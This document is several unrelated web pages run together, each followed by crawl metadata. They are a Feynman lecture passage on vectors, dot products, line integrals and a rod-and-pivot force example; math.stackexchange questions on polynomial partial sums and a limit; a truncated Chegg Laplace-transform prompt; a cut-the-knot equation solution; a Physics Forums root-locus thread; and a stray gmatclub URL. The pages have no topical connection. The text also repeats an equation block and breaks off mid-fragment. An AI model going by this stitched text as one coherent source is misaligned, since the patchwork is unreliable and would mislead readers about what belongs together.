Fig. 1–7.) $$\label{Eq:TIPS:1:10} F_x = |\FLPF|\cos\theta$$ Now, if $\FLPA$ and $\FLPB$ are added to make $\FLPC$, then the projections that are brought down to form a right angle in a given direction ‘$x$’, evidently add. So the components of the vector sum are the sum of the vector components, and that’s true of components in any direction. (See Fig. 1–8.) $$\label{Eq:TIPS:1:11} \FLPA + \FLPB = \FLPC \Rightarrow A_x + B_x = C_x.$$ Particularly convenient is the description of vectors in terms of their components on perpendicular axes, $x$ and $y$ (and $z$—there’s three dimensions in the world; I keep forgetting that, because I’m always drawing on a blackboard!). If we have a vector $\FLPF$ that is in the $x$-$y$ plane, and we know its component in the $x$ direction, that doesn’t completely define $\FLPF$, because there are many vectors in the $x$-$y$ plane that have the same component in the $x$ direction. But if we also know $\FLPF$’s component in the $y$ direction, then $\FLPF$ is completely specified. (See Fig. 1–9.) The components of $\FLPF$ along the $x$, $y$, and $z$ axes can be written as $F_x$, $F_y$, and $F_z$; summing vectors is equivalent to summing their components, so if the components of another vector $\FLPF'$ are $F'_x$, $F'_y$, and $F'_z$, then $\FLPF+\FLPF'$ has the components $F_x+F'_x$, $F_y+F'_y$, and $F_z+F'_z$ . That’s the easy part; now it gets a bit more difficult. There’s a way of multiplying two vectors to produce a scalar—a number that is the same in any coordinate system. (In fact, there’s a way of making a scalar out of one vector, and I’ll come back to that.) You see, if the coordinate axes change, then the components change—but the angle between vectors and their magnitudes stay the same. If $\FLPA$ and $\FLPB$ are vectors, and the angle between them is $\theta$, I can take the magnitude of $\FLPA$, times the magnitude of $\FLPB$ times the cosine of $\theta$ and call this number (“$\FLPA$ dot $\FLPB$”). (See Fig. 1–10.) That number, called a “dot product” or a “scalar product,” is the same in all coordinate systems: $$\label{Eq:TIPS:1:12} \FLPA\cdot\FLPB = |\FLPA||\FLPB|\cos{\theta}$$ It is evident that since $|\FLPA|\cos{\theta}$ is the projection of $\FLPA$ onto $\FLPB$, $\FLPA\cdot\FLPB$ is equal to the projection of $\FLPA$ onto $\FLPB$ times the magnitude of $\FLPB$. Similarly, since $|\FLPB|\cos{\theta}$ is the projection of $\FLPB$ onto $\FLPA$, $\FLPA\cdot\FLPB$ also equals the projection of $\FLPB$ onto $\FLPA$ times the magnitude of $\FLPA$. However, I find for myself that $\FLPA\cdot\FLPB = |\FLPA||\FLPB|\cos{\theta}$ is the easiest way to remember what the dot product is; then I can always see the other relations immediately. The trouble is, of course, you have so many ways of saying the same thing that it’s no good to try to remember them all—a point that I’ll make, in a few minutes, more completely. We can also define $\FLPA\cdot\FLPB$ in terms of the components of $\FLPA$ and $\FLPB$ on an arbitrary set of axes. If I were to take three mutually perpendicular axes, $x$, $y$, $z$, in some arbitrary orientation, then $\FLPA\cdot\FLPB$ will turn out to be $$\label{Eq:TIPS:1:13} \FLPA\cdot\FLPB = A_xB_x + A_yB_y + A_zB_z$$ It is not immediately self-evident how you get from $|\FLPA||\FLPB|\cos{\theta}$ to $A_xB_x + A_yB_y + A_zB_z$. Although I can prove it when I want to,3 it takes me too long, so I remember them both. When we take the dot product of a vector with itself, $\theta$ is $0$, and the cosine of $0$ is $1$, so \begin{equation*} \FLPA\cdot\FLPA = |\FLPA||\FLPA|\cos{0} = |\FLPA|^2. \end{equation*} In terms of components, it's \begin{equation*} \FLPA\cdot\FLPA = A_x^2 + A_y^2 + A_z^2. \end{equation*} The positive square root of that number is the magnitude of the vector. ### 1–7Differentiating vectors Now, we can do what’s called differentiating the vectors. The derivative of a vector with respect to time is meaningless unless the vector depends on the time, of course. That means we have to imagine some vector that is different all the time: as time goes on, the vector keeps changing, and we want the rate of change. For example, the vector $\FLPA(t)$ might be the position, at time $t$, of an object that’s flying around. At the next moment, $t'$, the object has moved from $\FLPA(t)$ to $\FLPA(t')$; we would like to calculate the rate of change of $\FLPA$ at time $t$. The rule is the following: that in the interval $\Delta t = t' - t$, the thing has moved from $\FLPA(t)$ to $\FLPA(t')$ so the displacement is $\Delta\FLPA = \FLPA(t') - \FLPA(t)$, a difference vector from the old position to the new position. (See Fig. 1–11.) Of course, the shorter the interval $\Delta t$, the closer $\FLPA(t')$ is to $\FLPA(t)$. If you divide $\Delta\FLPA$ by $\Delta t$ and then take the limit as they both approach zero—that’s the derivative. In this case, where $\FLPA$ is position, its derivative is a velocity vector; the velocity vector is in a direction tangent to the curve, because that’s the direction of the displacements; its magnitude you can’t get by looking at this picture, because it depends on how fast the thing is going along the curve. The magnitude of the velocity vector is the speed; it tells you how far the thing moves per unit time. So, that’s a definition of the velocity vector: it’s tangent to the path, and its magnitude is equal to the speed of motion on the path. (See Fig. 1-12.) $$\label{Eq:TIPS:1:14} \FLPv(t) = \ddt{\FLPA}{t} = \lim_{\Delta t \to 0}\frac{\Delta\FLPA}{\Delta t}$$ Incidentally, it is dangerous to draw both the position vector and the velocity vector in the same diagram, unless you’re being very careful—and since we’re having a little trouble understanding these things, I point out all the possible pitfalls that I can think of, because the next thing you might want to do is add $\FLPA$ to $\FLPv$ for some purpose. That’s not legitimate, because in order to really draw the velocity vector, you have to know the scale of time: the velocity vector is in a different scale than the position vector; in fact, they have different units. You can’t add positions and velocities together in general—and you can’t add them here. In order for me to actually draw the picture of any vector, I have to make a decision as to the scale. When we talked about forces, we said that so-andso many newtons were going to be represented by $1$ inch (or $1$ meter, or whatever). And here, we have to say that so-and-so many meters per second is going to be represented by $1$ inch. Someone else could draw the picture with position vectors the same lengths as ours, but with the velocity vector one-third as long as ours—he’s just using a different scale for his velocity vector. There’s no unique way to draw the length of a vector because the choice of scale is arbitrary. Now, the velocity in terms of $x$, $y$, and $z$ components is very easy, because, for example, the rate of change of the $x$ component of position is equal to the $x$ component of velocity, and so on. This is simply because the derivative is really a difference, and since the components of a difference vector equal the differences of the corresponding components, we have $$\label{Eq:TIPS:1:15} \left(\frac{\Delta\FLPA}{\Delta t}\right)_x\!= \frac{\Delta A_x}{\Delta t},\;\; \left(\frac{\Delta\FLPA}{\Delta t}\right)_y\!= \frac{\Delta A_y}{\Delta t},\;\; \left(\frac{\Delta\FLPA}{\Delta t}\right)_z\!= \frac{\Delta A_z}{\Delta t},$$ \begin{aligned} \left(\frac{\Delta\FLPA}{\Delta t}\right)_x\!&= \frac{\Delta A_x}{\Delta t},\\[1ex] \left(\frac{\Delta\FLPA}{\Delta t}\right)_y\!&= \frac{\Delta A_y}{\Delta t},\\[1ex] \left(\frac{\Delta\FLPA}{\Delta t}\right)_z\!&= \frac{\Delta A_z}{\Delta t}, \end{aligned} \label{Eq:TIPS:1:15} and then taking limits we have the components of the derivative: $$\label{Eq:TIPS:1:16} v_x = \ddt{A_x}{t},\;\;v_y = \ddt{A_y}{t},\;\;v_z = \ddt{A_z}{t}.\;\;$$ This is true for any direction: if I take the component of $\FLPA(t)$ in any direction, then the velocity vector component in that direction is the derivative of the component of $\FLPA(t)$ in that direction, with one serious warning: the direction must not change with time. You can’t say, “I’m gonna take the component of $\FLPA$ in the direction of $\FLPv$,” or something like that, because $\FLPv$ is moving. It’s only true that the derivative of the position component is equal to the velocity component if the direction in which you take the component is itself fixed So equations (1.15) and (1.16) are only true for $x$, $y$, $z$, and other fixed axes; if the axes are turning while you’re trying to take the derivative, the formula is much more complicated. Those are some of the deviations and difficulties of differentiating vectors. Of course, you can differentiate the derivative of a vector, then differentiate that, and so on. I called the derivative of $\FLPA$ “velocity,” but that’s only because $\FLPA$ is the position; if $\FLPA$ is something else, its derivative is something other than velocity. For example, if $\FLPA$ is the momentum, the time derivative of momentum equals the force, so the derivative of $\FLPA$ would be the force. And if $\FLPA$ were the velocity, the time derivative of the velocity is the acceleration, and so on. What I’ve been telling you is generally true of differentiating vectors, but here I’ve given only the example of positions and velocities. ### 1–8Line integrals Finally, there’s only one more thing that I have to talk about for vectors, and that is a horrible, complicated thing, called a “line integral”: $$\label{Eq:TIPS:1:17} \int_a^z \FLPF\cdot d\FLPs$$ We’ll take as an example that you have a certain vector field $\FLPF$, which you want to integrate along a curve $S$ from point $a$ to point $z$. Now, in order for this line integral to mean something, there must be some way of defining the value of $\FLPF$ at every point on $S$ between $a$ and $z$. If $\FLPF$ is defined as the force applied to an object at point $a$, but you can’t tell me how the force changes as you move along $S$, at least between $a$ and $z$, then “the integral of $\FLPF$ along $S$ from $a$ to $z$” makes no sense. (I said “at least,” because $\FLPF$ could be defined anywhere else too, but at least you must define it on the part of the curve that you are integrating along.) In a moment I’ll define the line integral of an arbitrary vector field along an arbitrary curve, but first let’s consider the case where $\FLPF$ is constant, and $S$ is a straight-line path from $a$ to $z$—a displacement vector, which I’ll call $\FLPs$. (See Fig. 1-13.) Then, since $\FLPF$ is constant, we can take it outside the integral (just like ordinary integration), and the integral of $d\FLPs$ from $a$ to $z$ is just $\FLPs$, so the answer is $\FLPF\cdot\FLPs$. That’s the line integral for a constant force and a straight-line path—the easy case: $$\label{Eq:TIPS:1:18} \int_a^z \FLPF\cdot d\FLPs = \FLPF\cdot\int_a^z d\FLPs = \FLPF\cdot\FLPs.$$ (Remember that $\FLPF\cdot\FLPs$ is the component of the force in the direction of the displacement times the magnitude of the displacement; in other words, it’s simply the distance along the line times the component of force in that direction. There are a lot of other ways to look at it, too: it’s the component of the displacement in the direction of the force, times the magnitude of the force; it’s the magnitude of the force times the magnitude of the displacement, times the cosine of the angle between them. These are all equivalent.) More generally, the line integral is defined as follows. First, we break up the integral by dividing $S$ between $a$ and $z$ into $N$ equal segments: $\Delta S_1,\Delta S_2\dots\Delta S_N$. Then the integral along $S$ is the integral along $\Delta S_1$ plus the integral along $\Delta S_2$ plus the integral along $\Delta S_3$, and so on. We choose $N$ large so that we can approximate each $\Delta S_i$ by a little displacement vector, $\Delta\FLPs_i$ over which $\FLPF$ has an approximately constant value $\FLPF_i$, (See Fig. 1-14.) Then, by the “constant force straight-line path” rule, segment $\Delta\FLPs_i$ contributes approximately $\FLPF_i\cdot\Delta\FLPs_i$ to the integral. So, if you add together $\FLPF_i\cdot\Delta\FLPs_i$ for $i$ equals $1$ to $N$, that’s an excellent approximation to the integral. The integral is exactly equal to this sum only if we take the limit as $N$ goes to infinity: you take the segments as fine as you can; you take them a little finer than that, and you get the correct integral: $$\label{Eq:TIPS:1:19} \int_a^z \FLPF\cdot d\FLPs = \lim_{N \to \infty}\sum_{i=1}^N \FLPF_i\cdot\Delta\FLPs_i.$$ (This integral, of course, depends upon the curve—generally—though sometimes it doesn’t in the physics.) Well, then, that’s all there is to the mathematics that you have to know to do the physics—for now, at least—and these things, most particularly the calculus and the early parts of the vector theory, should become second nature. Some things—like the line integral—may not be second nature now, but they will be, eventually, as you use them more; they aren’t so vital yet, and that’s harder. The things you “gotta get into your head good,” right now, are the calculus, and the little things about taking the components of vectors in various directions. ### 1–9A simple example I’ll give one example—just a very simple one—to show how to take components of vectors. Suppose we have a machine of some kind, as illustrated in Figure 1-15: it’s got two rods connected by a pivot (like an elbow joint) with a big weight on it. The end of one rod is connected to the floor by a stationary pivot, and the end of the other rod has a rolling pivot that rolls along the floor in a slot—it’s part of a machine, see, and it’s going choochoog, choo-choog—the roller’s going back and forth, the weight’s going up and down, and so on. Let’s say the weight is $2$ kg, the rods are $0.5$ meters long, and at a certain moment when the machine is standing still, the distance from the weight to the floor just happens to come out, luckily, to $0.4$ meters—so that we have a $\text{3-4-5}$ triangle, to make the arithmetic easier. (See Fig. 1-16.) (The arithmetic shouldn’t make any difference; the real difficulty is to get the ideas right.) The problem is to figure out what horizontal push $\FLPP$ you have to make on the roller in order to hold that weight up. Now, I’m going to make an assumption that we will need in order to do the problem. We make the assumption that when a rod has pivots at both ends, then the net force is always directed along the rod. (It turns out to be true; you may feel it’s self-evident.) It would not necessarily be true if there were a pivot only at one end of the rod, because then I could push the rod sideways. But if there’s a pivot at both ends, I can only push along the rod. So let’s suppose that we know that—that the forces must lie in the directions of the rods. We also know something else from the physics: that the forces are equal and opposite at the ends of the rods. For example, whatever force is exerted by the rod on the roller must also be exerted by that rod, in the opposite direction, on the weight. So, that’s the problem: with these ideas about the properties of rods, we try to figure out what’s the horizontal force on the roller. I think the way I’d like to try to do it is this: the horizontal force exerted on the roller by the rod is a certain component of the net force on it. (Of course, there’s also a vertical component due to the “confining slot,” which is unknown and uninteresting; it’s part of the net force on the roller, which is exactly opposite the net force on the weight.) Therefore I can get the components of the force exerted on the roller by the rod—in particular, the horizontal component I want—if I can get the components of the force exerted by the rod on the weight. If I call the horizontal force on the weight $F_x$ then the horizontal force on the roller is $-F_x$ and the force needed to hold the weight up is equal and opposite to that, so $|\FLPP| = F_x$. The vertical force on the weight from the rod, $F_y$, is very easy: it’s simply equal to the weight of the thing, which is $2$ kg, times $g$, the gravitational constant. (Something else you have to know from physics—$g$ is 9.8, in the mks system.) $F_y$ is $2$ times $g$, or $19.6$ newtons, so the vertical force on the roller is $–19.6$ newtons. Now, how can I get the horizontal force? Answer: I get it by knowing that the net force must lie along the rod. If $F_y$ is $19.6$, and the net force lies along the rod, then how much must $F_x$ be? (See Fig. 1-17.) Well, we have the projections of the triangles, which have been designed very nicely, so that the ratio of the horizontal to the vertical sides is $3$ to $4$; that’s the same ratio as $F_x$ is to $F_y$, (I don’t care about the net force, $\FLPF$, here; I only need the force in the horizontal direction) and I already know what the vertical force is. So, the magnitude of the horizontal force—unknown—is to $19.6$ as $0.3$ is to $0.4$. Therefore I multiply $3/4$ by $19.6$ and I get: \begin{aligned} \frac{F_x}{19.6} &= \frac{0.3}{0.4}.\\[1.5ex] \therefore F_x &= \frac{0.3}{0.4} \times 19.6 = 14.7\text{ newtons}. \end{aligned} \label{Eq:TIPS:1:20} We conclude that the horizontal force on the roller needed to hold the weight up, is $14.7$ newtons. That’s the answer to this problem. Or is it? You see, you can’t do physics just by plugging in the formulas: you’ll never get anywhere without having something else besides knowing the rules, the formulas for projections, and all that stuff; you have to have a certain feeling for the real situation! I’ll make some more remarks about that in a minute, but here, in this particular problem, the difficulty is the following: the net force on the weight is not only from one rod, there’s also a force exerted on it by the other rod, in some direction, and I left that out when I made the analysis—so it’s all wrong! I also have to worry about the force that the rod with the stationary pivot exerts on the weight. Now it’s getting complicated: how can I figure out what that force is? Well, what is the net force of everything on the weight? Just the gravity—it just balances the gravity; there is no force horizontally on the weight. So the clue by which I can find out how much “juice” there is along the rod with the stationary pivot, is to notice that it must exert just enough horizontally to balance the horizontal force that the other rod is exerting. Therefore, if I were to draw the force that the rod with the stationary pivot exerts, its horizontal component would be exactly opposite the horizontal component that the rod with the roller exerts, and the vertical components would be equal because of the identical $\text{3-4-5}$ triangles the rods make: both rods are pushing up the same amount because their horizontal components must balance—if the rods were different lengths, you’d have a little more work to do, but it’s the same idea. So, let’s start out with the weight again: the forces from the rods on the weight are the first things to get straightened out. So, let’s look at the forces from the rods on the weight. The reason I keep repeating this to myself is because otherwise I get the signs all mixed up: The force from the weight on the rods is the opposite of the force from the rods on the weight. I always have to start over after I get all balled up like this; I have to think it out again, and make up my mind as to what I want to talk about. So I say, “Look at the forces from the rods on the weight: there’s a force $\FLPF$, which is in the direction of one rod. Then there’s a force $\FLPF'$ in the direction of the other rod. Those are the only two forces, and they are in the directions of the rods.” Now, the net of these two forces—ahhhh! I’m beginning to see the light! The net of these two forces has no horizontal component, and a vertical component of $19.6$ newtons. Ah! Let me draw the picture again, since I did it wrong before. (See Fig. 1-18.) The horizontal forces balance, therefore the vertical components add, and the $19.6$ newtons is not just the vertical component of the force from one rod, but the total from both; since each rod contributes half, the vertical component from the rod with the roller is only $9.8$ newtons. Now when we take the horizontal projection of this force, multiplying it by as we did before, we get the horizontal component of force from the rod with the roller on the weight, and that takes care of that: \begin{aligned} \frac{F_x}{9.8} &= \frac{0.3}{0.4}.\\[1.5ex] \therefore F_x &= \frac{0.3}{0.4} \times 9.8 = 7.35\text{ newtons}. \end{aligned} \label{Eq:TIPS:1:21} ### 1–10Triangulation I have a few moments left, so I’d like to make a little speech about the relation of the mathematics to the physics—which, in fact, was well illustrated by this little example. It will not do to memorize the formulas, and to say to yourself, “I know all the formulas; all I gotta do is figure out how to put ’em in the problem!” Now, you may succeed with this for a while, and the more you work on memorizing the formulas, the longer you’ll go on with this method—but it doesn’t work in the end. You might say, “I’m not gonna believe him, because I’ve always been successful: that’s the way I’ve always done it; I’m always gonna do it that way.” You are not always going to do it that way: you’re going to flunk—not this year, not next year, but eventually, when you get your job, or something—you’re going to lose along the line somewhere, because physics is an enormously extended thing: there are millions of formulas! It’s impossible to remember all the formulas—it’s impossible! And the great thing that you’re ignoring, the powerful machine that you’re not using, is this: suppose Figure 1-19 is a map of all the physics formulas, all the relations in physics. (It should have more than two dimensions, but let’s suppose it’s like that.) Now, suppose that something happened to your mind, that somehow all the material in some region was erased, and there was a little spot of missing goo in there. The relations of nature are so nice that it is possible, by logic, to “triangulate” from what is known to what’s in the hole. (See Fig. 1-20.) And you can re-create the things that you’ve forgotten perpetually—if you don’t forget too much, and if you know enough. In other words, there comes a time—which you haven’t quite got to, yet—where you’ll know so many things that as you forget them, you can reconstruct them from the pieces that you can still remember. It is therefore of first-rate importance that you know how to “triangulate”—that is, to know how to figure something out from what you already know. It is absolutely necessary. You might say, “Ah, I don’t care; I’m a good memorizer! I know how to really memorize! In fact, I took a course in memory!” That still doesn’t work! Because the real utility of physicists—both to discover new laws of nature, and to develop new things in industry, and so on—is not to talk about what’s already known, but to do something new—and so they triangulate out from the known things: they make a “triangulation” that no one has ever made before. (See Fig. 1-21.) In order to learn how to do that, you’ve got to forget the memorizing of formulas, and to try to learn to understand the interrelationships of nature. That’s very much more difficult at the beginning, but it’s the only successful way. 1. No one went out. 2. Only men were admitted to Caltech in 1961. 3. See The Feynman Lectures on Physics (FLP) Vol. I, Section 11–7.
2022-11-28 20:45:36
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 24, "x-ck12": 0, "texerror": 0, "math_score": 0.814072847366333, "perplexity": 297.3442452090273}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-49/segments/1669446710662.60/warc/CC-MAIN-20221128203656-20221128233656-00638.warc.gz"}
http://math.stackexchange.com/questions/97999/partial-sum-of-a-polynomial
# Partial Sum of a Polynomial [duplicate] Possible Duplicate: why is $\sum\limits_{k=1}^{n} k^m$ a polynomial with degree $m+1$ in $n$ I'm searching for a way to find the partial sum of a polynomial, is there any way of doing this formulaically instead of just guessing and checking? For example... $$\sum_{x=1}^n {x^{2}}=?$$ or... $$\sum_{x=1}^n (4x^2+7x+2)=?$$ - ## marked as duplicate by t.b., Asaf Karagila, Guess who it is., Zev ChonolesJan 24 '12 at 4:32 –  Arjang Jan 11 '12 at 0:27 Because of linearily, it is enough to find $S_k(n)=\sum_{x=0}^nx^k$. This can be done with Bernoulli polynomials using Faulhaber's formula. A little computation using this information shows that, for example, $$\sum_{x=1}^N(4x^2+7x+2)=\frac{1}{6} \left(8 N^3+33 N^2+37 N\right).$$ - You can also find a formula directly. The partial sums of a polynomial function are given by a polynomial function. Since the higher-order differences of the values of a polynomial function are eventually zero, you can go backwards and find an expression for the sum in terms of Newton polynomials with coefficients the first element in each row of differences; see http://en.wikipedia.org/wiki/Newton_series#Newton.27s_series. For your example, the differences are $0 \quad 13 \quad 45 \quad 104 \quad 198$ $13 \quad 32 \quad 59 \quad 94$ $19 \quad 27 \quad 35$ $8 \quad 8$ $0$ and so the formula is $$0{n \choose 0} + 13{n \choose 1}+19{n \choose 2}+8{n \choose 3}$$ which of course agrees with Mariano's answer. - A nice explanation is math.stackexchange.com/a/18990/589 –  lhf Jan 11 '12 at 0:40 Wolfram Alpha can also find a formula. –  lhf Jan 11 '12 at 0:47
2015-05-27 18:18:29
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9385457634925842, "perplexity": 567.5710349010524}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2015-22/segments/1432207929023.5/warc/CC-MAIN-20150521113209-00004-ip-10-180-206-219.ec2.internal.warc.gz"}
http://www.chegg.com/homework-help/questions-and-answers/use-the-laplace-transform-to-solve-the-following-initial-value-problem-use-stept-c-for-q3408050
## Use the Laplace transform to solve the following initial value problem (If you can help me with this I can finish the rest) Use the Laplace transform to solve the following initial value problem: Use step(t-c) for.
2013-05-20 03:23:18
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9676849842071533, "perplexity": 145.93688530349576}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2013-20/segments/1368698222543/warc/CC-MAIN-20130516095702-00018-ip-10-60-113-184.ec2.internal.warc.gz"}
https://math.stackexchange.com/questions/3114042/error-while-evaluating-limit
# Error While Evaluating Limit ***Please Avoid This Question**** $$\lim_{x\rightarrow 0}\frac{27^x - 9^x - 3^x + 1}{\sqrt{2} - \sqrt{1+\cos x}}$$ I tried to solve it by applying the L'Hospital's rule. $$\lim_{x\rightarrow 0}\frac{27^x\ln27- 9^x\ln9- 3^x\ln3 + 0}{(-1/2)/\sqrt{1+\cos x}}$$ Now simply apply the limit, $$\lim_{x\rightarrow 0}\frac{1\ln27- 1\ln9 - 1\ln3}{(-1/2)/\sqrt{2}}=0$$ But the correct answer in my textbook is $$8\sqrt{2}(\ln3)^2$$ Where am I doing incorrect? Edit: I did a silly mistake while Solving it. • rationalise the denominator. now write the 1- cos x as $2 sin^2 x$ – maveric Feb 15 at 15:55 The derivative of $$\sqrt{1+\cos x}$$ is $$\dfrac{-\sin x}{2\sqrt{1+\cos x}}$$
2019-09-20 05:58:51
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 6, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9871071577072144, "perplexity": 952.948065881063}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-39/segments/1568514573832.23/warc/CC-MAIN-20190920050858-20190920072858-00320.warc.gz"}
https://www.cut-the-knot.org/m/Algebra/SystemOfEllipticEquations.shtml
# A System of Two Equations Replete with Squares ### Solution Let, for simplicity, $a=x^2,\,b=y^2.\,$ The system can be written as \displaystyle \left\{\begin{align}&16a+25b=400\\&a+b=\frac{(4a+5b)^2}{400}\end{align}\right. The second equation transforms into $400(a+b)=(4a+5b)^2.\,$ Replacing $400\,$ from the first equation gives $(16a+25b)(a+b)=(4a+5b)^2,$ i.e., $16a^2+25ab+16ab+25b^2=16a^2+40ab+25b^2,$ which simplifies to $ab=0,\,$ same as $xy=0.\,$ Note that $x,y\,$ can't vanish simultaneously. Thus, two cases: either $x=0\,$ or $y=0.\,$ The first case gives solutions $(0,\pm 4),\,$ the second $(\pm 5, 0).$ ### Acknowledgment Dan Sitaru has kindly posted the above problem of his from the Romanian Mathematical Magazine at the CutTheKnotMath facebook page, along with the above solution by Seyran Ibrahimov.
2019-04-19 06:30:36
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 1, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8472871780395508, "perplexity": 873.5518503400835}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-18/segments/1555578527148.46/warc/CC-MAIN-20190419061412-20190419083412-00467.warc.gz"}
http://www.physicsforums.com/showthread.php?p=2219243
Coursework : Root Locus Quote by CEL When is$$Ke^{-\alpha t}$$ equal to 0.01K or 0.02K? $$\frac{-ln(0.01)}{\alpha}$$ Quote by CEL Obtain the time response and verify how long does it take from 10% to 90% of ss. I have got the steady state value but how do I get the time response ? Laplace Transform ? Isn't there some shorter method ? This is because I have got a zero as well in the PI controller so the general formulae doesnt work..Any approximation ? I dont want to go for any tedious method... Quote by Altairs I have got the steady state value but how do I get the time response ? Laplace Transform ? Isn't there some shorter method ? This is because I have got a zero as well in the PI controller so the general formulae doesnt work..Any approximation ? I dont want to go for any tedious method... You must take the inverse tarnsform of the response Y(s). Don't forget that the transform of the step is 1/s, so the s in the denominator cancels the s in the numerator. Similar discussions for: Coursework : Root Locus Thread Forum Replies Engineering, Comp Sci, & Technology Homework 4 General Engineering 3 Electrical Engineering 1 Engineering, Comp Sci, & Technology Homework 1 Math & Science Software 1
2013-06-19 01:24:16
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8015670776367188, "perplexity": 1063.6373466442103}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2013-20/segments/1368707439012/warc/CC-MAIN-20130516123039-00021-ip-10-60-113-184.ec2.internal.warc.gz"}
http://gmatclub.com/forum/what-is-the-remainder-when-32-32-32-is-divided-by-100316-20.html?kudos=1
